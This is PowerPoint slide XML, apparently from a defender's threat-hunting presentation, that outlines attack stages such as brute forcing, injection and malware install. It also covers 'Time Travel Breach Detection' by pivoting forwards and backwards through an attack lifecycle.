            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2388038235"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1063452" y="1104302"/>
          <a:ext cx="10309568" cy="1037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541673" y="2409525"/>
            <a:ext cx="8831347" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="505050"/>
          </a:solidFill>
          <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="505050">
                <a:shade val="50000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="40801" tIns="13600" rIns="13600" bIns="13600" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1020" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t> Installation of RDP brute-forcing tools, email lists installed for spamming, ...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3960853" y="2766346"/>
            <a:ext cx="7412167" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="505050"/>
          </a:solidFill>
          <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="505050">
                <a:shade val="50000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="40801" tIns="13600" rIns="13600" bIns="13600" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1020" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>    RDP brute forcing, SQL injection, Elastic Search injection, exploits for known server vulnerabilities, …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5526005" y="3123168"/>
            <a:ext cx="5847015" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="44882" tIns="14961" rIns="14961" bIns="14961" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1071" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>  Successful login with brute forced credential, successful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1071" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>SQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1071" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>, …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6993841" y="3479990"/>
            <a:ext cx="4379178" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="44882" tIns="14961" rIns="14961" bIns="14961" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1071" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>   Malware installed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8429240" y="3836812"/>
            <a:ext cx="2943780" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="68217A"/>
          </a:solidFill>
          <a:ln w="17145" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:shade val="95000"/>
                <a:alpha val="50000"/>
                <a:satMod val="150000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="lt1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="44882" tIns="14961" rIns="14961" bIns="14961" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1071" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>   Malware communicates for updates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9771379" y="4193631"/>
            <a:ext cx="1601641" cy="356822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="68217A"/>
          </a:solidFill>
          <a:ln w="17145" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:shade val="95000"/>
                <a:alpha val="50000"/>
                <a:satMod val="150000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="lt1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent2"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="44882" tIns="14961" rIns="14961" bIns="14961" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1071" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t> Spam, Bitcoin mining, …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Explosion 1 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750756" y="3475287"/>
            <a:ext cx="413179" cy="478919"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFB900"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D83B0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6" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310351" y="4284541"/>
            <a:ext cx="5966755" cy="1787412"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 analytic leads to…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 detection. Investigation yields…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 more attack elements. Searching all leads to…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 more affected tenants. Investigating them leads to…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5 new attack elements.  Adding coverage leads to…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>…Iterate until the closure of the pivoting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4836361" y="3479989"/>
            <a:ext cx="2089504" cy="382308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932597">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1836" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A detection fires…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Arrow: Down 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="17515388">
            <a:off x="8327711" y="3358349"/>
            <a:ext cx="381000" cy="199007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Down 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="6237632">
            <a:off x="4220334" y="2192380"/>
            <a:ext cx="381000" cy="199007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587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14" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0"/>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appliance, air conditioner&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{379CC938-1531-BF7A-75CE-E8299B1AD1FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="2727" t="19403" r="2082" b="4976"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1771916" y="3344059"/>
            <a:ext cx="9647583" cy="3153343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA6C39C5-3276-B5BA-C764-0434122506F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Time Travel Breach Detection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A587886E-9F0F-EEFF-CC9B-B885CD8CF1F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595914" y="1463669"/>
            <a:ext cx="11239789" cy="1723549"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normally you must tailor your hunting to the current phase of the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However you can search for them in any phase of their activity and follow the attack forwards/backwards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is where a big data system pays off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Optimize discovery by searching for “bottlenecks” in the attack lifecycle with fewer techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="61" name="Group 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31EEE398-FFE7-3DEE-25C2-886632897F52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1150918" y="3519142"/>
            <a:ext cx="10038271" cy="3086193"/>
            <a:chOff x="544004" y="3169036"/>
            <a:chExt cx="10038271" cy="3086193"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="62" name="Group 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97F73E4E-8CDB-2FB2-5663-4104F95CFB7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1476375" y="3169036"/>
              <a:ext cx="9105900" cy="2178414"/>
              <a:chOff x="1476375" y="3009900"/>
              <a:chExt cx="9105900" cy="2314575"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="67" name="Straight Connector 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF642774-33F1-0131-0E97-CBA5249B1F27}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1476375" y="3009900"/>
                <a:ext cx="9105900" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:headEnd type="none"/>
                <a:tailEnd type="none"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="68" name="Straight Connector 67">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F2EF419-BAE7-F35D-12BB-4DE240696DD9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1476375" y="3333750"/>
                <a:ext cx="9105900" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:headEnd type="none"/>
                <a:tailEnd type="none"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="69" name="Straight Connector 68">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74DD1048-7E9F-AF50-19A7-501C5AF6CC6E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1476375" y="3667125"/>
                <a:ext cx="9105900" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:headEnd type="none"/>
                <a:tailEnd type="none"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="70" name="Straight Connector 69">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662AA831-F3B6-F2F1-F07C-786404726005}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1476375" y="3990975"/>
                <a:ext cx="9105900" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:headEnd type="none"/>
                <a:tailEnd type="none"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="71" name="Straight Connector 70">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAC553A4-96FE-4705-23C9-45307A74F329}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1476375" y="4343400"/>
                <a:ext cx="9105900" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:headEnd type="none"/>
                <a:tailEnd type="none"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="72" name="Straight Connector 71">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1D7577B-18DC-7CC8-BA17-14C1E9F49B90}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1476375" y="4667250"/>
                <a:ext cx="9105900" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:headEnd type="none"/>
                <a:tailEnd type="none"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="73" name="Straight Connector 72">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F915F94-4824-9DBE-CFEB-57A9C1E1D94C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1476375" y="5000625"/>
                <a:ext cx="9105900" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:headEnd type="none"/>
                <a:tailEnd type="none"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="74" name="Straight Connector 73">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A442FC9-EA68-E8A0-3213-FA8BBD3196F3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1476375" y="5324475"/>
                <a:ext cx="9105900" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:headEnd type="none"/>
                <a:tailEnd type="none"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="TextBox 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0FDC2A5-5681-BCB0-CC52-B0FF292DF11C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
